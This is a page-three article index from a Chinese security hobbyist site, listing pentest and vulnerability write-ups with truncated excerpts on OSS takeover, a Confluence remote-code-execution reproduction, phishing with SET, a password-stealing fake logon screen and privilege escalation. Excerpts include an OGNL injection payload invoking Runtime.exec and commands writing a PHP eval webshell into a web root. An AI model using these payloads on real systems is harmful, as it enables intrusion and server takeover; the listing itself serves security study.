网络安全 第3页
XSS社区是网络安全爱好者聚集地
排序
从 js map 泄露到接管 OSS 对象存储
现在 OSS 对象存储应用广泛,但开发者安全意识普遍较低,方便之余的同时也会随之带来一些安全风险。虽然本文的场景不是那种 APP 或者源码里面硬编码泄露的 AK 和 SK ,敏感信息虽然都放在了后端...
10个月前
若依后台管理系统渗透
6个月前
漏洞复现 – confluence 远程代码执行
/${(#[email protected]@toString(@java.lang.Runtime@getRuntime().exec('COMMAND').getInputStream(),'utf-8')).(@com.opensymphony.webwork.ServletActionContext@getRespons...
10个月前
社会工程 — 使用社会工程工具包 (SET) 进行网络钓鱼
免责声明!!! 本演示使用社会工程工具包 (SET) 工具仅用于教育目的。目的是提高人们对恶意行为者实施网络钓鱼攻击所采用技术的认识,并教育参与者如何识别和减轻此类威胁。 请参与者注意,未...
10个月前
记php命令执行写shell
php代码执行&命令执行 getshell echo PD9waHAgZXZhbCgkX1BPU1Rbd2hvYW1pXSk7Pz4=|base64 -d > /var/www/html/shell.php echo \<\?php eval\(\@\$_POST\[1\]\)\; \?\> >1.php bypass 绕过...
1年前
代码审计-TP5 框架及无框架变量覆盖反序列化
漏洞关键字 SQL 注入:select insert update mysql_query mysqli 等 文件上传:$_FILES,type=”file”,上传,move_uploaded_file() 等 XSS 跨站:print print_r echo sprintf die var_dump va...
10个月前
FakeLogonScreen – 伪造Windows登录屏幕以窃取密码
FakeLogonScreen是一个伪造Windows登录屏幕以获取用户密码的实用程序。输入的密码将根据Active Directory或本地计算机进行验证,以确保其正确,然后显示到控制台或保存到磁盘。 它可以通过简单...
10个月前
API 接口测试
一、API 接口介绍 1.1 RPC(远程过程调用) 远程过程调用(英语:Remote Procedure Call,缩写为 RPC)是一个计算机通信协议。该协议允许运行于一台计算机的程序调用另一台计算机的子程序,而程...
10个月前
CVE-2019-12937 ToaruOS权限提升分析
ToaruOS是一套使用C语言编写的开源计算机操作系统,是一个由伊利诺伊大学计算机科学本科生开发的业余爱好操作系统。ToAruOS可在POSIX和x86架构上运行。ToAruOS的主要功能包括对进程和线程的支持...
10个月前